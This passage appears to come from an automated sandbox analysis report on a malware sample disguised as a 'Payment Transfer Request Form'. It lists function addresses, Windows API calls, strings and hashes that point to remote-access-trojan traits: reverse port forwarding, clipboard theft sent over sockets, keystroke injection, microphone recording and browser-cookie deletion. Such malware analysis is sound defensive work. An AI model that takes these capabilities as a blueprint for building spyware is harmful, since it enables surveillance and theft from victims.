                                              • Opcode Fuzzy Hash: 6a629144b245819b38f2933f29616ef2380529a0a937335efbac9e54df28edc4
                                              • Instruction Fuzzy Hash: CD013971901308ABCB10DBB9ED4EEDB7BBCFB85B05F40417AF51992061D7B89489CB68
                                              Function 00449F63 Relevance: 13.8, APIs: 9, Instructions: 300COMMONLIBRARYCODE
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: d7410a98b278d9d25d0fcdc47fb7c960ad5f7d9b58d6d06d1c87314e37a5ed65
                                              • Instruction ID: 53180985ac70b1d9c95f382170f9691aec8243d5c40cf1d2be039b65846bfc46
                                              • Opcode Fuzzy Hash: d7410a98b278d9d25d0fcdc47fb7c960ad5f7d9b58d6d06d1c87314e37a5ed65
                                              • Instruction Fuzzy Hash: 2DC12970D44245AFEB11DFA8D841BEEBBB0BF19304F04419AE844A7392C7798D51DB6B
                                              Function 00450F63 Relevance: 13.8, APIs: 9, Instructions: 268COMMON
                                              Download Yara Rule
                                              APIs
                                              • GetCPInfo.KERNEL32(00000000,00000001,?,7FFFFFFF,?,?,0045123C,00000000,00000000,?,00000001,?,?,?,?,00000001), ref: 0045100F
                                              • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000001,00000000,00000000,?,0045123C,00000000,00000000,?,00000001,?,?,?,?), ref: 00451092
                                              • __alloca_probe_16.LIBCMT ref: 004510CA
                                              • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000001,00000000,0045123C,?,0045123C,00000000,00000000,?,00000001,?,?,?,?), ref: 00451125
                                              • __alloca_probe_16.LIBCMT ref: 00451174
                                              • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,0045123C,00000000,00000000,?,00000001,?,?,?,?), ref: 0045113C
                                                • Part of subcall function 00443649: RtlAllocateHeap.NTDLL(00000000,00433069,?,?,004365E7,?,?,00000000,00473A38,?,0040C88A,00433069,?,?,?,?), ref: 0044367B
                                              • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,0045123C,00000000,00000000,?,00000001,?,?,?,?), ref: 004511B8
                                              • __freea.LIBCMT ref: 004511E3
                                              • __freea.LIBCMT ref: 004511EF
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocateHeapInfo
                                              • String ID:
                                              • API String ID: 201697637-0
                                              • Opcode ID: 3fb5d38a305e3cd885e4cf01d6a6faccac9c0be3147af9b9f82741c0feb9dacf
                                              • Instruction ID: 005ec385ace484c3041e352596739c7debf7d66643145b34d09858c349e559c3
                                              • Opcode Fuzzy Hash: 3fb5d38a305e3cd885e4cf01d6a6faccac9c0be3147af9b9f82741c0feb9dacf
                                              • Instruction Fuzzy Hash: C191D632E002169BDB209EA5C881BAF7BB59F09716F14025BED00E7292D72DDD89C768
                                              Function 0044268B Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 266COMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00445725: GetLastError.KERNEL32(?,0043EE9A,00438595,0043EE9A,00471E90,?,0043CC1A,FF8BC35D,00471E90,00471E90), ref: 00445729
                                                • Part of subcall function 00445725: _free.LIBCMT ref: 0044575C
                                                • Part of subcall function 00445725: SetLastError.KERNEL32(00000000,FF8BC35D,00471E90,00471E90), ref: 0044579D
                                                • Part of subcall function 00445725: _abort.LIBCMT ref: 004457A3
                                              • _memcmp.LIBVCRUNTIME ref: 00442935
                                              • _free.LIBCMT ref: 004429A6
                                              • _free.LIBCMT ref: 004429BF
                                              • _free.LIBCMT ref: 004429F1
                                              • _free.LIBCMT ref: 004429FA
                                              • _free.LIBCMT ref: 00442A06
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: _free$ErrorLast$_abort_memcmp
                                              • String ID: C
                                              • API String ID: 1679612858-1037565863
                                              • Opcode ID: 432fc3ea507ab00d5c61cbebfc7d6860faf6a87f9b6526557229100be8563697
                                              • Instruction ID: aeaf983377083d43a1268bd0837f448671c9c2270315b144058cc99b7af0bbb4
                                              • Opcode Fuzzy Hash: 432fc3ea507ab00d5c61cbebfc7d6860faf6a87f9b6526557229100be8563697
                                              • Instruction Fuzzy Hash: C6B14B75A01219DFEB24DF19C984AAEB7B4FF08314F5045AEE849A7350E774AE90CF44
                                              Function 00413360 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 225COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID: tcp$udp
                                              • API String ID: 0-3725065008
                                              • Opcode ID: 688bcc682103751b5d6e0fc50f4ff73081394bc5db4df513150874dffde81862
                                              • Instruction ID: 0146648cb9627796ba72a5075a1bb19f593c332394d5faf8ede73001e6eead87
                                              • Opcode Fuzzy Hash: 688bcc682103751b5d6e0fc50f4ff73081394bc5db4df513150874dffde81862
                                              • Instruction Fuzzy Hash: 0271AB306083029FDB24CF55C4456ABBBE5AB88B06F14483FF88587351DB78CE85CB8A
                                              Function 0040FF5A Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 191COMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Eventinet_ntoa
                                              • String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse
                                              • API String ID: 3578746661-168337528
                                              • Opcode ID: 035bfc4778cbd1147fb7c7760a67f5a58305d03ef9b3c3f33c5966ee6578fdb6
                                              • Instruction ID: 6b7c77c2de925f44c7fd0444b04eaa142d1c015a05a303cede5520b91582e870
                                              • Opcode Fuzzy Hash: 035bfc4778cbd1147fb7c7760a67f5a58305d03ef9b3c3f33c5966ee6578fdb6
                                              • Instruction Fuzzy Hash: 1B51C671A043005BC704FB35E81AAAE36A56B85304F50453FF942972E2EFBD998987CF
                                              Function 004069F4 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 102fileCOMMON
                                              Download Yara Rule
                                              APIs
                                              • CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00000000,00471E78,00462F54,?,00000000,0040708D,00000000), ref: 00406A56
                                              • WriteFile.KERNEL32(00000000,?,00000000,000186A0,00000000,?,000186A0,?,?,00000000,0040708D,00000000,?,?,0000000A,00000000), ref: 00406A9E
                                                • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
                                              • CloseHandle.KERNEL32(00000000,?,00000000,0040708D,00000000,?,?,0000000A,00000000), ref: 00406ADE
                                              • MoveFileW.KERNEL32(00000000,00000000), ref: 00406AFB
                                              • CloseHandle.KERNEL32(00000000,00000057,?,00000008,?,?,?,?,?,?,?,0000000A,00000000), ref: 00406B26
                                              • DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,?,0000000A,00000000), ref: 00406B36
                                                • Part of subcall function 00404B76: WaitForSingleObject.KERNEL32(?,000000FF,00000000,00471E90,00404C29,00000000,?,?,00000000,00471E90,00404AA9), ref: 00404B85
                                                • Part of subcall function 00404B76: SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040546B), ref: 00404BA3
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: File$CloseHandle$CreateDeleteEventMoveObjectSingleWaitWritesend
                                              • String ID: .part
                                              • API String ID: 1303771098-3499674018
                                              • Opcode ID: b311657231bfd1ddbcc4a820267832357b1505ed209a9d42b0dbde4102a0be9c
                                              • Instruction ID: 678cfffe15af58d7f0b712f13b91f409224560124cae5e22a1f642ab954cf825
                                              • Opcode Fuzzy Hash: b311657231bfd1ddbcc4a820267832357b1505ed209a9d42b0dbde4102a0be9c
                                              • Instruction Fuzzy Hash: 183195715043519FC210FF61D8859AFB7E8EF84305F40493FB946A21E1DB78DE488B9A
                                              Function 00446FC4 Relevance: 12.2, APIs: 8, Instructions: 216COMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,0043E2F6,0043E2F6,?,?,?,00447215,00000001,00000001,80E85006), ref: 0044701E
                                              • __alloca_probe_16.LIBCMT ref: 00447056
                                              • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00447215,00000001,00000001,80E85006,?,?,?), ref: 004470A4
                                              • __alloca_probe_16.LIBCMT ref: 0044713B
                                              • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,80E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0044719E
                                              • __freea.LIBCMT ref: 004471AB
                                                • Part of subcall function 00443649: RtlAllocateHeap.NTDLL(00000000,00433069,?,?,004365E7,?,?,00000000,00473A38,?,0040C88A,00433069,?,?,?,?), ref: 0044367B
                                              • __freea.LIBCMT ref: 004471B4
                                              • __freea.LIBCMT ref: 004471D9
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                                              • String ID:
                                              • API String ID: 3864826663-0
                                              • Opcode ID: 04037ebd5a1a4f50f5415f33d7545ea1837db620aa2cb0a216d5dedd30da5abc
                                              • Instruction ID: 54c76e5b98bc3e662f405ec50a570bffd16f8396d3d33e450f7b83ec1f761fab
                                              • Opcode Fuzzy Hash: 04037ebd5a1a4f50f5415f33d7545ea1837db620aa2cb0a216d5dedd30da5abc
                                              • Instruction Fuzzy Hash: C051F372604216AFFB258F65CC81EAF77A9EB44754F19422EFC04D6340EB38DC4296A8
                                              Function 00417949 Relevance: 12.1, APIs: 8, Instructions: 102keyboardCOMMON
                                              Download Yara Rule
                                              APIs
                                              • SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 00417982
                                              • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 004179A3
                                              • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 004179C3
                                              • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 004179D7
                                              • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 004179ED
                                              • SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 00417A0A
                                              • SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 00417A25
                                              • SendInput.USER32(00000001,?,0000001C,?,00000000), ref: 00417A41
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: InputSend
                                              • String ID:
                                              • API String ID: 3431551938-0
                                              • Opcode ID: 6aaf5890e5c1829a4f0a9f9de961f2057ca44ae286fc2f2a8f4f79c9cdb01491
                                              • Instruction ID: 18205c9a4f61e0979ba7f31da2e0396e133b47f61cec1eebe1044e0c870e5742
                                              • Opcode Fuzzy Hash: 6aaf5890e5c1829a4f0a9f9de961f2057ca44ae286fc2f2a8f4f79c9cdb01491
                                              • Instruction Fuzzy Hash: BF3180715583086EE311CF51D941BEBBFECEF99B54F00080FF6809A191D2A696C98BA7
                                              Function 00414F40 Relevance: 12.0, APIs: 8, Instructions: 49clipboardCOMMON
                                              Download Yara Rule
                                              APIs
                                              • OpenClipboard.USER32 ref: 00414F41
                                              • EmptyClipboard.USER32 ref: 00414F4F
                                              • CloseClipboard.USER32 ref: 00414F55
                                              • OpenClipboard.USER32 ref: 00414F5C
                                              • GetClipboardData.USER32(0000000D), ref: 00414F6C
                                              • GlobalLock.KERNEL32(00000000), ref: 00414F75
                                              • GlobalUnlock.KERNEL32(00000000), ref: 00414F7E
                                              • CloseClipboard.USER32 ref: 00414F84
                                                • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Clipboard$CloseGlobalOpen$DataEmptyLockUnlocksend
                                              • String ID:
                                              • API String ID: 2172192267-0
                                              • Opcode ID: 828cfcc74c82ea041a7dd29e4e1c173cc2e20efda03bf5817e1bab7b2f8bf981
                                              • Instruction ID: b342c93700c1c5b5557293b3c64df63ecfc3f94f93ee8c928ebb46f035b43356
                                              • Opcode Fuzzy Hash: 828cfcc74c82ea041a7dd29e4e1c173cc2e20efda03bf5817e1bab7b2f8bf981
                                              • Instruction Fuzzy Hash: 7C015E312443009BD314BF71DC596AA76A8EBE0346F81057EB94A931A3DF3899498A9A
                                              Function 00447757 Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              • GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,00447ECC,00453EB5,00000000,00000000,00000000,00000000,00000000), ref: 00447799
                                              • __fassign.LIBCMT ref: 00447814
                                              • __fassign.LIBCMT ref: 0044782F
                                              • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 00447855
                                              • WriteFile.KERNEL32(?,00000000,00000000,00447ECC,00000000,?,?,?,?,?,?,?,?,?,00447ECC,00453EB5), ref: 00447874
                                              • WriteFile.KERNEL32(?,00453EB5,00000001,00447ECC,00000000,?,?,?,?,?,?,?,?,?,00447ECC,00453EB5), ref: 004478AD
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                              • String ID:
                                              • API String ID: 1324828854-0
                                              • Opcode ID: a748b16374f527b7a80cf69ed727348adf3f69da4df0249be72511d103bd3332
                                              • Instruction ID: 74b5e8c6f427b63fe2026e60454d3d85c0c1d9029b0a2cc1a9ecb7a500eaa1fe
                                              • Opcode Fuzzy Hash: a748b16374f527b7a80cf69ed727348adf3f69da4df0249be72511d103bd3332
                                              • Instruction Fuzzy Hash: 32510870E042499FEB10DFA8DC85AEEBBF8EF09300F14416BE951E7291E7749941CB69
                                              Function 00453DF4 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 152COMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: _free
                                              • String ID: $-E$$-E
                                              • API String ID: 269201875-3140958853
                                              • Opcode ID: ee8e1cba0696e1ef76f6de9b16e819625eafbf0b8f389bd133dd680e215230cb
                                              • Instruction ID: 9707d98a659f88f98630b1874925085f47dfd26ea07d7c57405a666b90b138a8
                                              • Opcode Fuzzy Hash: ee8e1cba0696e1ef76f6de9b16e819625eafbf0b8f389bd133dd680e215230cb
                                              • Instruction Fuzzy Hash: 69412C32A041006BDB21AFBA8C4666F3BA5DF453B7F10461FFC18D6293DB3C8E15466A
                                              Function 00401CEB Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 89COMMON
                                              Download Yara Rule
                                              APIs
                                              • _strftime.LIBCMT ref: 00401D30
                                                • Part of subcall function 00401A4D: CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AB9
                                              • waveInUnprepareHeader.WINMM(0046FA78,00000020,00000000,?), ref: 00401DE2
                                              • waveInPrepareHeader.WINMM(0046FA78,00000020), ref: 00401E20
                                              • waveInAddBuffer.WINMM(0046FA78,00000020), ref: 00401E2F
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: wave$Header$BufferCreateFilePrepareUnprepare_strftime
                                              • String ID: %Y-%m-%d %H.%M$.wav
                                              • API String ID: 3809562944-3597965672
                                              • Opcode ID: b10e30c525f246f4611f68b91188478031edfba2b9a6cbdc9954c4cf903c77cf
                                              • Instruction ID: eb6f517cf981021e41f9baa65c06222081641aa24e02a1e4c78245b08a68fc14
                                              • Opcode Fuzzy Hash: b10e30c525f246f4611f68b91188478031edfba2b9a6cbdc9954c4cf903c77cf
                                              • Instruction Fuzzy Hash: 743150315043009BC314EBA1EC56A9E77E8FB54318F50893EF599A21F2EFB49909CB5E
                                              Function 0040AE2A Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 87COMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00411F91: RegOpenKeyExA.KERNELBASE(80000002,00000400,00000000,00020019,?), ref: 00411FB5
                                                • Part of subcall function 00411F91: RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,?,00000400), ref: 00411FD2
                                                • Part of subcall function 00411F91: RegCloseKey.KERNELBASE(?), ref: 00411FDD
                                              • ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,00000000), ref: 0040AEAC
                                              • PathFileExistsA.SHLWAPI(?), ref: 0040AEB9
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CloseEnvironmentExistsExpandFileOpenPathQueryStringsValue
                                              • String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
                                              • API String ID: 1133728706-4073444585
                                              • Opcode ID: 370a5f736c1175a4c73cc9f78fb379498555740690ae6c69fa9422c82b9c0863
                                              • Instruction ID: 9e227284a7a69f00510d3be81dd7cde1580ac9a58a9ca8fbd928e09bf644cbd9
                                              • Opcode Fuzzy Hash: 370a5f736c1175a4c73cc9f78fb379498555740690ae6c69fa9422c82b9c0863
                                              • Instruction Fuzzy Hash: CF21B170A4020556CB00FBE2CC97DEE7368AF51348F80013FB901772D2EB795A45C6DA
                                              Function 00453D2D Relevance: 10.6, APIs: 7, Instructions: 80COMMONLIBRARYCODE
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: a9bccf30988101774ee440fa5cc9a08b358316fbf5677ac8bfda6d7ead677197
                                              • Instruction ID: 106e2cecea33a690a52cc41c1271e31c3df1f85e8271d36c5dacef07d135bc52
                                              • Opcode Fuzzy Hash: a9bccf30988101774ee440fa5cc9a08b358316fbf5677ac8bfda6d7ead677197
                                              • Instruction Fuzzy Hash: 2C113232504214BBCB213F769C0596B7B7CDF857A7F11062BFC1583292DA38C9089269
                                              Function 0044E0DA Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 0044DE21: _free.LIBCMT ref: 0044DE4A
                                              • _free.LIBCMT ref: 0044E128
                                                • Part of subcall function 00443C92: HeapFree.KERNEL32(00000000,00000000,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?), ref: 00443CA8
                                                • Part of subcall function 00443C92: GetLastError.KERNEL32(?,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?,?), ref: 00443CBA
                                              • _free.LIBCMT ref: 0044E133
                                              • _free.LIBCMT ref: 0044E13E
                                              • _free.LIBCMT ref: 0044E192
                                              • _free.LIBCMT ref: 0044E19D
                                              • _free.LIBCMT ref: 0044E1A8
                                              • _free.LIBCMT ref: 0044E1B3
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: _free$ErrorFreeHeapLast
                                              • String ID:
                                              • API String ID: 776569668-0
                                              • Opcode ID: d645742a9f031bfd4c53cfe37fe00a001808073c56fe889b6c8b285726f20831
                                              • Instruction ID: b65b67035ea7ffc6fe2c1778d32cb4f6cbb79ca162155871331ff7aa41bb66fd
                                              • Opcode Fuzzy Hash: d645742a9f031bfd4c53cfe37fe00a001808073c56fe889b6c8b285726f20831
                                              • Instruction Fuzzy Hash: 64111571940B08AAE520BFF2CC47FCBB7DC9F14708F50882EB29D6A552DA7DB6044654
                                              Function 004380FA Relevance: 10.6, APIs: 7, Instructions: 60COMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              • GetLastError.KERNEL32(?,?,004380F1,0043705E), ref: 00438108
                                              • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00438116
                                              • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0043812F
                                              • SetLastError.KERNEL32(00000000,?,004380F1,0043705E), ref: 00438181
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ErrorLastValue___vcrt_
                                              • String ID:
                                              • API String ID: 3852720340-0
                                              • Opcode ID: 8fa3eba41d5dfcfa025b4cdbc1becdc984892f6557d94f52d480fd9577c81c63
                                              • Instruction ID: 5a832d73688d02476ca7511e273f3515cfb573674d76dbd3fe9934521fa1a72b
                                              • Opcode Fuzzy Hash: 8fa3eba41d5dfcfa025b4cdbc1becdc984892f6557d94f52d480fd9577c81c63
                                              • Instruction Fuzzy Hash: F101283210C3326EAA102F767C85A1BAA94EB09779F31633FF214951E1FFA99C02550C
                                              Function 0040A9E2 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 49fileCOMMON
                                              Download Yara Rule
                                              APIs
                                              • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Cookies), ref: 0040AA1E
                                              • GetLastError.KERNEL32 ref: 0040AA28
                                              Strings
                                              • [Chrome Cookies not found], xrefs: 0040AA42
                                              • UserProfile, xrefs: 0040A9EE
                                              • [Chrome Cookies found, cleared!], xrefs: 0040AA4E
                                              • \AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 0040A9E9
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: DeleteErrorFileLast
                                              • String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
                                              • API String ID: 2018770650-304995407
                                              • Opcode ID: b4927beb3b7d8682d6e8687247d88e98b96e581d4f5d1102126ce03b4be6211c
                                              • Instruction ID: 1f34f6daae66b163f55af04f15e1d0b60933b3567ae099988c08ef58cbd90c9e
                                              • Opcode Fuzzy Hash: b4927beb3b7d8682d6e8687247d88e98b96e581d4f5d1102126ce03b4be6211c
                                              • Instruction Fuzzy Hash: 0E01F731B4020467C6047A75DD278AE77249951304B50057FF402773D2FD798915CA9F
                                              Function 0043887C Relevance: 9.3, APIs: 6, Instructions: 284COMMON
                                              Download Yara Rule
                                              APIs
                                              • __allrem.LIBCMT ref: 00438A09
                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00438A25
                                              • __allrem.LIBCMT ref: 00438A3C
                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00438A5A
                                              • __allrem.LIBCMT ref: 00438A71
                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00438A8F
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                              • String ID:
                                              • API String ID: 1992179935-0
                                              • Opcode ID: e54fcd2a271a95563de48233a52a921a5b89548056e17f80f76cd68e5be4f8c8
                                              • Instruction ID: 1db505a437643d25cad1e1ab06004ebe691486694b679651004c0d70fbe8f9c1
                                              • Opcode Fuzzy Hash: e54fcd2a271a95563de48233a52a921a5b89548056e17f80f76cd68e5be4f8c8
                                              • Instruction Fuzzy Hash: CD815972A007069BE724BA29CC41B6BF3E8AF49328F14512FF511D6382EF78D900875D
                                              Function 00442E0B Relevance: 9.2, APIs: 6, Instructions: 200COMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: __cftoe
                                              • String ID:
                                              • API String ID: 4189289331-0
                                              • Opcode ID: 0fae115f831cac106012114eb4540e124d695819a26846d31b7a5b9ad28ad3e8
                                              • Instruction ID: 4563a9c63fae0d6d7f7aa9a83d474a3ec136fb2d14012502de5dff0b8c27d610
                                              • Opcode Fuzzy Hash: 0fae115f831cac106012114eb4540e124d695819a26846d31b7a5b9ad28ad3e8
                                              • Instruction Fuzzy Hash: CB510C32500205ABFB209F598E45EAF77B8EF48334FE0421FF415D6282EB79D941966C
                                              Function 00444A81 Relevance: 9.1, APIs: 3, Strings: 2, Instructions: 389COMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: __freea$__alloca_probe_16_free
                                              • String ID: a/p$am/pm
                                              • API String ID: 2936374016-3206640213
                                              • Opcode ID: 5bf20948ecfdcfc47f5d03c18463ec118060d09d36ce90c1cff5387842e26ce9
                                              • Instruction ID: 5910b70c00eb86a61931efff1dda8232d7c1eee9eff2524394b85f82b3a3e216
                                              • Opcode Fuzzy Hash: 5bf20948ecfdcfc47f5d03c18463ec118060d09d36ce90c1cff5387842e26ce9
                                              • Instruction Fuzzy Hash: 05D1E171900206CAFB289F68C895BBBB7B1FF85300F29415BE905AB391D73D9D81CB59
